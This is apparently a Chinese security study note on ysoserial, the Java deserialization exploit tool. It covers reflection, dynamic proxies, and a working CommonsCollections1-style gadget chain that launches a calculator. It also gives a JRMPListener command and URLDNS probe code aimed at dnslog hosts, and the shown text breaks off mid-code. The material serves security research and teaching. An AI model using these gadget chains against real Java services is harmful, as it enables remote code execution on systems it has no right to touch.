<p>Runtime类的构造方法就是一个私有方法</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211222110430986.png" alt="image-20211222110430986"></p>
<p>此时使用Constructor m = clazz.getConstructor();形式获取其构造函数会报错，应当使用如下形式</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Class clazz = Class.forName(<span class="string">&quot;java.lang.Runtime&quot;</span>);</span><br><span class="line">Constructor m = clazz.getDeclaredConstructor();</span><br><span class="line">m.setAccessible(<span class="keyword">true</span>);		<span class="comment">// 设置私有方法的可访问性</span></span><br><span class="line">clazz.getMethod(<span class="string">&quot;exec&quot;</span>, String.class).invoke(m.newInstance(), <span class="string">&quot;calc.exe&quot;</span>);</span><br></pre></td></tr></table></figure>

<h2 id="动态代理"><a href="#动态代理" class="headerlink" title="动态代理"></a>动态代理</h2><p>From：<a target="_blank" rel="noopener" href="https://www.liaoxuefeng.com/wiki/1252599548343744/1264804593397984">https://www.liaoxuefeng.com/wiki/1252599548343744/1264804593397984</a></p>
<p>Java的class和interface的区别：</p>
<ul>
<li>可以实例化<code>class</code>（非<code>abstract</code>）</li>
<li>不能实例化<code>interface</code>，可以被继承</li>
</ul>
<p>所有interface类型的变量总是通过某个实例向上转型并赋值给接口类型变量的：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">CharSequence cs = new StringBuilder();</span><br></pre></td></tr></table></figure>

<p>Java标准库提供了一种动态代理（Dynamic Proxy）的机制：<strong>可以在运行期动态创建某个interface的实例</strong></p>
<h3 id="通常接口使用示例"><a href="#通常接口使用示例" class="headerlink" title="通常接口使用示例"></a>通常接口使用示例</h3><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 定义接口</span></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">interface</span> <span class="title">Hello</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">void</span> <span class="title">morning</span><span class="params">(String name)</span></span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 编写接口实现类</span></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">HelloWorld</span> <span class="keyword">implements</span> <span class="title">Hello</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">morning</span><span class="params">(String name)</span> </span>&#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;Good morning, &quot;</span> + name);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 调用方法</span></span><br><span class="line">Hello hello = <span class="keyword">new</span> HelloWorld();</span><br><span class="line">hello.morning(<span class="string">&quot;Bob&quot;</span>);</span><br></pre></td></tr></table></figure>

<h3 id="动态代理使用接口"><a href="#动态代理使用接口" class="headerlink" title="动态代理使用接口"></a>动态代理使用接口</h3><p>我们仍然需要先定义接口<code>Hello</code>，但是我们并不需要去编写实现类，而是直接通过JDK提供的<code>Proxy.newProxyInstance</code>方法来创建一个<code>Hello</code>接口的对象。这种没有实现类但是在运行期动态创建了一个接口对象的方式，称为动态代码。JDK提供的动态创建接口对象的方式，就叫动态代理。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.lang.reflect.InvocationHandler;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Method;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Proxy;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 定义接口</span></span><br><span class="line"><span class="class"><span class="keyword">interface</span> <span class="title">Hello</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">void</span> <span class="title">morning</span><span class="params">(String name)</span></span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">DynamicProxyTest</span> </span>&#123;</span><br><span class="line">  </span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> </span>&#123;</span><br><span class="line">     </span><br><span class="line">        InvocationHandler handler = <span class="keyword">new</span> InvocationHandler() &#123;</span><br><span class="line">          	<span class="comment">// 动态代理以后，所有方法的调用实际上都在调用InvocationHandler类的invoke方法</span></span><br><span class="line">            <span class="meta">@Override</span></span><br><span class="line">            <span class="function"><span class="keyword">public</span> Object <span class="title">invoke</span><span class="params">(Object proxy, Method method, Object[] args)</span> <span class="keyword">throws</span> Throwable </span>&#123;</span><br><span class="line">                System.out.println(method);</span><br><span class="line">                <span class="keyword">if</span> (method.getName().equals(<span class="string">&quot;morning&quot;</span>)) &#123;</span><br><span class="line">                    System.out.println(<span class="string">&quot;Good morning, &quot;</span> + args[<span class="number">0</span>]);</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">return</span> <span class="keyword">null</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;;</span><br><span class="line">      </span><br><span class="line">        Hello hello = (Hello) Proxy.newProxyInstance(</span><br><span class="line">            Hello.class.getClassLoader(), <span class="comment">// 传入ClassLoader</span></span><br><span class="line">            <span class="keyword">new</span> Class[] &#123; Hello.class &#125;, <span class="comment">// 传入要实现的接口</span></span><br><span class="line">            handler); <span class="comment">// 传入处理调用方法的InvocationHandler</span></span><br><span class="line">      	<span class="comment">// 这里调用的就是我们定义的代理类handle的invoke(Object proxy, Method method, Object[] args)</span></span><br><span class="line">      	<span class="comment">// 其中参数proxy在上一行hello创建过程中已经传入，method参数就是改行代码调用的函数morning</span></span><br><span class="line">      	<span class="comment">// args参数就是“Bob”</span></span><br><span class="line">        hello.morning(<span class="string">&quot;Bob&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h1 id="项目结构"><a href="#项目结构" class="headerlink" title="项目结构"></a>项目结构</h1><p>大体分为生成代码、利用库（工具库）、payloads库、序列化库 这四大库。</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221000541403.png" alt="image-20211221000541403"></p>
<h1 id="入口函数"><a href="#入口函数" class="headerlink" title="入口函数"></a>入口函数</h1><p>从pom.xml中可以看出主类为<strong>ysoserial.GeneratePayload</strong></p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221002203168.png" alt="image-20211221002203168"></p>
<p>GeneratePayload -&gt; main方法主要逻辑如下</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221005855001.png" alt="image-20211221005855001"></p>
<p>图示如下(<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/229108#h2-21">https://www.anquanke.com/post/id/229108#h2-21</a>)</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221010044827.png" alt="image-20211221010044827"></p>
<h1 id="Utils库"><a href="#Utils库" class="headerlink" title="Utils库"></a>Utils库</h1><p>ObjectPayload接口是一个泛型接口</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221011344119.png" alt="image-20211221011344119"></p>
<h2 id="getPayloadClass"><a href="#getPayloadClass" class="headerlink" title="getPayloadClass"></a>getPayloadClass</h2><p>getPayloadClasses在Utils中有2个重载(见上图)</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 公开的静态方法，返回值为集合，集合Set&lt;&gt;本身就是一个泛型类，需要指定内部数据类型，此处的内部数据类型为继承了ObjectPayload的类</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> Set&lt;Class&lt;? extends ObjectPayload&gt;&gt; getPayloadClasses ()</span><br><span class="line"></span><br><span class="line"><span class="comment">//公开的静态方法，返回值为继承了ObjectPayload的类</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> Class&lt;? extends ObjectPayload&gt; getPayloadClass ( <span class="keyword">final</span> String className )</span><br></pre></td></tr></table></figure>

<p>以上述第二个方法定义分析，其内部逻辑如下</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221100456809.png" alt="image-20211221100456809"></p>
<h2 id="makePayloadObject"><a href="#makePayloadObject" class="headerlink" title="makePayloadObject"></a>makePayloadObject</h2><p>对payload模板进行命令填充，并返回填充后的对象</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221105714253.png" alt="image-20211221105714253"></p>
<h2 id="releasePayload"><a href="#releasePayload" class="headerlink" title="releasePayload"></a>releasePayload</h2><p>释放对象内存，releasePayload也有2个重载</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221110054908.png" alt="image-20211221110054908"></p>
<h1 id="序列化与反序列化库"><a href="#序列化与反序列化库" class="headerlink" title="序列化与反序列化库"></a>序列化与反序列化库</h1><p>各自单独存放，分别完成包含利用链的对象的序列化与反序列化工作。</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221110223969.png" alt="image-20211221110223969"></p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221110908001.png" alt="image-20211221110908001"></p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221111403248.png" alt="image-20211221111403248"></p>
<p>为了测试方便在Deserializer类的main中包含了测试函数，从文件中读取序列化内容并进行反序列化触发验证漏洞</p>
<h1 id="Payloads库"><a href="#Payloads库" class="headerlink" title="Payloads库"></a>Payloads库</h1><p>Payload库中包含了大量的反序列化链，使得反序列化漏洞利用更加简单方便。</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221112109592.png" alt="image-20211221112109592"></p>
<h1 id="Exploit库"><a href="#Exploit库" class="headerlink" title="Exploit库"></a>Exploit库</h1><p>该库主要是开启交互式服务，包含了JBoss、Jenkins、JMX、JRMP、JSF、RMI等多种利用方式。以JRMPListener为例，服务开启命令如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -cp ysoserial.jar ysoserial.exploit.JRMPListener 7777 CommonsCollections1 &#x27;ping -c 2 www.baidu.com&#x27;</span><br></pre></td></tr></table></figure>

<p>该命令运行的是ysoserial.exploit.JRMPListener类的main方法</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221113430555.png" alt="image-20211221113430555"></p>
<p>该类内部逻辑图示如下<br>From:<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/229108#h3-10">https://www.anquanke.com/post/id/229108#h3-10</a></p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221113544218.png" alt="image-20211221113544218"></p>
<h1 id="测试类PayloadRunner"><a href="#测试类PayloadRunner" class="headerlink" title="测试类PayloadRunner"></a>测试类PayloadRunner</h1><p>PayloadRunner为测试类，主要负责在编写添加payloads库之后测试其效果。</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221123820648.png" alt="image-20211221123820648"></p>
<p>在payloads单个类中添加如下main方法并运行即可</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(<span class="keyword">final</span> String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">    PayloadRunner.run(CommonsBeanutils1.class, args);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>其测试的逻辑为：</p>
<ol>
<li>对传入的class用newInstance实例化</li>
<li>调用对象的getObject方法</li>
<li>获取到填充好利用链的对象</li>
<li>调用序列化方法进行序列化输出</li>
<li>调用反序列化函数触发序列化利用链</li>
</ol>
<h1 id="扩展Payload库"><a href="#扩展Payload库" class="headerlink" title="扩展Payload库"></a>扩展Payload库</h1><p>将自己编写的payload代码放在ysoserial/src/main/java/ysoserial/payloads/下，需要注意以下几点：</p>
<ol>
<li>实现ObjectPayload接口</li>
<li>添加PayloadRunner测试方法</li>
<li>编写说明和注意事项</li>
</ol>
<h2 id="Transformer-利用链"><a href="#Transformer-利用链" class="headerlink" title="Transformer 利用链"></a>Transformer 利用链</h2><h3 id="InvokerTransformer"><a href="#InvokerTransformer" class="headerlink" title="InvokerTransformer"></a>InvokerTransformer</h3><p>该利用链中InvokerTransformer类是最终完成命令执行的类</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221175143523.png" alt="image-20211221175143523"></p>
<p>添加测试代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">public class test01 &#123;</span><br><span class="line"></span><br><span class="line">    public static void main(String[] args) &#123;</span><br><span class="line">        InvokerTransformer it = new InvokerTransformer(</span><br><span class="line">                &quot;exec&quot;,</span><br><span class="line">                new Class[]&#123;String.class&#125;,</span><br><span class="line">                new Object[]&#123;&quot;clac.exe&quot;&#125;</span><br><span class="line">                );</span><br><span class="line">        it.transform(Runtime.getRuntime());</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221223503557.png" alt="image-20211221223503557"></p>
<p>项目jdk版本选用1.7的话会报错：无法解析的静态符号DESERIALIZE_TRANSLET，不知道怎么解决，遂将jdk换为1.8</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221225933167.png" alt="image-20211221225933167"></p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221230257555.png" alt="image-20211221230257555"></p>
<h3 id="ChainedTransformer"><a href="#ChainedTransformer" class="headerlink" title="ChainedTransformer"></a>ChainedTransformer</h3><p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221231311537.png" alt="image-20211221231311537"></p>
<p>根据上述分析可以构造出命令执行逻辑如下</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221233810142.png" alt="image-20211221233810142"></p>
<h3 id="TransformedMap"><a href="#TransformedMap" class="headerlink" title="TransformedMap"></a>TransformedMap</h3><p>TransformedMap中有2个Transformer成员</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221234726686.png" alt="image-20211221234726686"></p>
<p>并且其checkSetValue方法会调用valueTransformer成员的transform方法，而checkSetValue方法会在该类的setValue方法调用时自动调用</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221235019047.png" alt="image-20211221235019047"></p>
<p>之后的分析中只需关注谁调用了TransformedMap的setValue方法就可以了，valueTransformer对象的赋值在构造方法中，因为构造方法为protected，所以可以采用public static 方法decorate调用，参数都是一样的。</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211221235249666.png" alt="image-20211221235249666"></p>
<h3 id="AnnotationInvocationHandler"><a href="#AnnotationInvocationHandler" class="headerlink" title="AnnotationInvocationHandler"></a>AnnotationInvocationHandler</h3><p>该注解类重写了父类的readObject方法并实现了Serializable接口，并且其readObject方法中调用了setValue方法（idea中没找到该类的定义）</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title">readObject</span><span class="params">(ObjectInputStream var1)</span> <span class="keyword">throws</span> IOException, ClassNotFoundException </span>&#123;</span><br><span class="line">        var1.defaultReadObject();</span><br><span class="line">        Iterator var4 = <span class="keyword">this</span>.memberValues.entrySet().iterator();</span><br><span class="line">        ......</span><br><span class="line">        <span class="keyword">while</span>(var4.hasNext()) &#123;</span><br><span class="line">            Entry var5 = (Entry)var4.next();</span><br><span class="line">           ......</span><br><span class="line">                <span class="keyword">if</span> (!var7.isInstance(var8) &amp;&amp; !(var8 <span class="keyword">instanceof</span> ExceptionProxy)) &#123;</span><br><span class="line">                    var5.setValue((<span class="keyword">new</span> AnnotationTypeMismatchExceptionProxy(var8.getClass() + <span class="string">&quot;[&quot;</span> + var8 + <span class="string">&quot;]&quot;</span>)).setMember((Method)var2.members().get(var6)));</span><br><span class="line"></span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<h2 id="编写payload库"><a href="#编写payload库" class="headerlink" title="编写payload库"></a>编写payload库</h2><p>基于上述分析，构造逻辑如下</p>
<p>From:<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/229108#h2-15">https://www.anquanke.com/post/id/229108#h2-15</a></p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211222005444032.png" alt="image-20211222005444032"></p>
<p>AnnotationInvocationHandler不是public类，外部包不能直接创建。需要通过反射setAccessible(true)设置访问其中的私有方法。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Class cls = Class.forName(<span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);</span><br><span class="line">Constructor ctor = cls.getDeclaredConstructor(<span class="keyword">new</span> Class[] &#123; Class.class, Map.class &#125;);</span><br><span class="line">ctor.setAccessible(<span class="keyword">true</span>);</span><br><span class="line">Object instance = ctor.newInstance(<span class="keyword">new</span> Object[] &#123; Retention.class, outMap &#125;);</span><br></pre></td></tr></table></figure>

<p>最终代码如下</p>
<p>From：<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/229108#h2-15">https://www.anquanke.com/post/id/229108#h2-15</a></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">mytest</span> <span class="keyword">extends</span> <span class="title">PayloadRunner</span> <span class="keyword">implements</span> <span class="title">ObjectPayload</span>&lt;<span class="title">Object</span>&gt; </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> Object <span class="title">getObject</span><span class="params">(<span class="keyword">final</span> String command)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        Transformer[] transformers = <span class="keyword">new</span> Transformer[]&#123;</span><br><span class="line">            <span class="keyword">new</span> ConstantTransformer(Runtime.class),</span><br><span class="line"><span class="comment">//            new ConstantTransformer(Runtime.getRuntime()),</span></span><br><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">&quot;getMethod&quot;</span>, <span class="keyword">new</span> Class[] &#123; String.class, Class[].class &#125;, <span class="keyword">new</span> Object[] &#123;<span class="string">&quot;getRuntime&quot;</span>, <span class="keyword">new</span> Class[<span class="number">0</span>] &#125;),</span><br><span class="line">                <span class="keyword">new</span> InvokerTransformer(<span class="string">&quot;invoke&quot;</span>, <span class="keyword">new</span> Class[]&#123;Object.class, Object[].class&#125;, <span class="keyword">new</span> Object[]&#123;<span class="keyword">null</span>, <span class="keyword">new</span> Object[<span class="number">0</span>]&#125;),</span><br><span class="line">            <span class="keyword">new</span> InvokerTransformer(<span class="string">&quot;getRuntime&quot;</span>, <span class="keyword">null</span>, <span class="keyword">null</span>),</span><br><span class="line">            <span class="keyword">new</span> InvokerTransformer(<span class="string">&quot;exec&quot;</span>, <span class="keyword">new</span> Class[]&#123;String.class&#125;, <span class="keyword">new</span> Object[]&#123;<span class="string">&quot;/System/Applications/Calculator.app/Contents/MacOS/Calculator&quot;</span>&#125;)</span><br><span class="line">        &#125;;</span><br><span class="line">        Transformer chainedTransformer = <span class="keyword">new</span> ChainedTransformer(transformers);</span><br><span class="line">        Map inMap = <span class="keyword">new</span> HashMap();</span><br><span class="line">        inMap.put(<span class="string">&quot;value&quot;</span>, <span class="string">&quot;aa&quot;</span>);</span><br><span class="line">        Map outMap = TransformedMap.decorate(inMap, <span class="keyword">null</span>, chainedTransformer);</span><br><span class="line">        Class cls = Class.forName(<span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);</span><br><span class="line">        Constructor ctor = cls.getDeclaredConstructor(<span class="keyword">new</span> Class[] &#123; Class.class, Map.class &#125;);</span><br><span class="line">        ctor.setAccessible(<span class="keyword">true</span>);</span><br><span class="line">        Object instance = ctor.newInstance(<span class="keyword">new</span> Object[] &#123; Retention.class, outMap &#125;);</span><br><span class="line">        <span class="keyword">return</span> instance;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        PayloadRunner.run(mytest.class, args);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h1 id="URLDNS链"><a href="#URLDNS链" class="headerlink" title="URLDNS链"></a>URLDNS链</h1><p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211222232836280.png" alt="image-20211222232836280"></p>
<h2 id="Dns请求发起"><a href="#Dns请求发起" class="headerlink" title="Dns请求发起"></a>Dns请求发起</h2><p>从java基础章节的hashmap介绍中可知，hashmap在执行put方法时会计算key的hashcode(调用<key>.hashcode())然后与value一起存储。再看URL类，其中有hashcode方法</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211222233311291.png" alt="image-20211222233311291"></p>
<p>跟入handler.hashCode</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211222233411200.png" alt="image-20211222233411200"></p>
<p>跟入getHostAddress(u)，可以看到这里发起了dns请求</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211222233529936.png" alt="image-20211222233529936"></p>
<p>调用链</p>
<p>hashmap.put(Url,XX)<br>    -&gt;URL.hashCode<br>        -&gt;handler.hashCode<br>            -&gt;getHostAddress(u)<br>                -&gt;host=u.getHost()<br>                    -&gt;InetAddress.getByName(host)    发出dns请求</p>
<p>测试一下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> MalformedURLException </span>&#123;</span><br><span class="line"></span><br><span class="line">    HashMap&lt;URL, String&gt; hashMap = <span class="keyword">new</span> HashMap&lt;URL, String&gt;();</span><br><span class="line">    URL test_url= <span class="keyword">new</span> URL(<span class="string">&quot;http://urldns.test.nofjxs.dnslog.cn/test.txt&quot;</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    hashMap.put(test_url, <span class="string">&quot;lalala&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211222235128927.png" alt="image-20211222235128927"></p>
<h2 id="反序列化触发Dns请求"><a href="#反序列化触发Dns请求" class="headerlink" title="反序列化触发Dns请求"></a>反序列化触发Dns请求</h2><p>前述只是从hashmap到发起dns请求的过程，中间并未涉及到序列化与反序列化操作，看一下hashmap的readobject方法，其中有如下操作</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211223003008272.png" alt="image-20211223003008272"></p>
<p>跟入hash(key)，对每个key调用其hashCode方法，当key为URL类型时就会触发前述的dns请求触发链</p>
<p><img src="Ysoserial%E6%94%B9%E9%80%A0%E5%9F%BA%E7%A1%80.assets/image-20211223003059530.png" alt="image-20211223003059530"></p>
<p>hashmap反序列化触发dns请求代码如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line"></span><br><span class="line">    HashMap&lt;URL, String&gt; hashMap = <span class="keyword">new</span> HashMap&lt;URL, String&gt;();</span><br><span class="line">    URL url = <span class="keyword">new</span> URL(<span class="string">&quot;http://test.6l1bni.dnslog.cn/test.txt&quot;</span>);</span><br><span class="line"></span><br><span class="line">    Field f = Class.forName(<span class="string">&quot;java.net.URL&quot;</span>).getDeclaredField(<span class="string">&quot;hashCode&quot;</span>);</span><br><span class="line">    f.setAccessible(<span class="keyword">true</span>);</span><br><span class="line">    <span class="comment">/* 将url.hashCode置为-1以外的值是为了在构造序列化数据时使hashMap.put不会触发</span></span><br><span class="line"><span class="comment">    ** url.hashcode中的handler.hashCode(this)操作</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    f.set(url, <span class="number">0xdeadbeef</span>);</span><br><span class="line">    <span class="comment">// 将url放入hashMap中，右边参数随便写</span></span><br><span class="line">    hashMap.put(url, <span class="string">&quot;lalala&quot;</span>);</span><br><span class="line">    <span class="comment">/* 修改url的hashCode字段为-1，使反序列化时hashMap.put能触发url.hashcode中的</span></span><br><span class="line"><span class="comment">    **handler.hashCode(this)操作从而触发DNS查询</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    f.set(url, -<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 输出序列化数据</span></span><br><span class="line">    ObjectOutputStream oos = <span class="keyword">new</span> ObjectOutputStream(<span class="keyword">new</span> FileOutputStream(<span 